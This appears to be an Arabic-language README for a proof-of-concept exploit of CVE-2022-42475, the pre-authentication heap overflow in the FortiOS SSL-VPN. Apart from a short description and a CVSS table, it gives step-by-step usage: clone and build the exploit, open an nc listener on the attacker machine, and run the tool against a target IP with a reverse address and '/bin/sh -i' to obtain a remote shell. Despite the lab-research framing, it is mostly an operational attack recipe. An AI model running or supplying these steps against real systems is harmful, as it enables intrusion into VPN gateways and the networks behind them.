
إثبات المفهوم (PoC) لأغراض البحث والتحقق المخبري المتحكم به من CVE-2022-42475، وهي ثغرة أمنية حرجة من نوع تجاوز سعة المخزن المؤقت في الكومة (heap-based buffer overflow) تؤثر على خدمة SSL-VPN في إصدارات معينة من FortiOS.
تنفيذ تعليمات برمجية عن بُعد قبل المصادقة في Fortinet SSL VPN
CVE-2022-42475 هي ثغرة أمنية من نوع تجاوز سعة المخزن المؤقت المستند إلى الكومة (heap-based buffer overflow) في خدمة SSL VPN الخاصة بـ FortiOS، وتسمح للمهاجمين غير المصادَق عليهم بتنفيذ تعليمات برمجية عشوائية عن بُعد (RCE) عبر طلبات HTTP مصممة خصيصًا موجهة إلى نقطة النهاية /remote/error.
تم استغلال هذه الثغرة بنشاط في البيئة الفعلية (0-day) قبل إصدار التصحيح الرسمي.
تُظهر اللقطة التالية تنفيذ الـ PoC في بيئة مختبرية مُصرَّح بها:
يُظهر المخرَج تنفيذ الـ PoC والتفاعل مع مثيل FortiOS المستخدم في الاختبارات.

| الحقل | القيمة |
|---|
| CVE ID | CVE-2022-42475 |
| CVSS 3.1 | 9.3 (حرجة) |
| المتجه | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-122 |
| تاريخ الاكتشاف | ديسمبر 2022 |
| التصحيح الرسمي | FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16 |
# استنساخ أو تنزيل الكود المصدري
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc
# التجميع
go build -o exploit exploit.go
# أو التنفيذ مباشرة
go run exploit.go <target> <port> <reverse_ip> <params>
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]
# على جهاز المهاجم، ابدأ مستمعًا
nc -lvnp 80
# نفّذ الأداة الاستغلالية
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i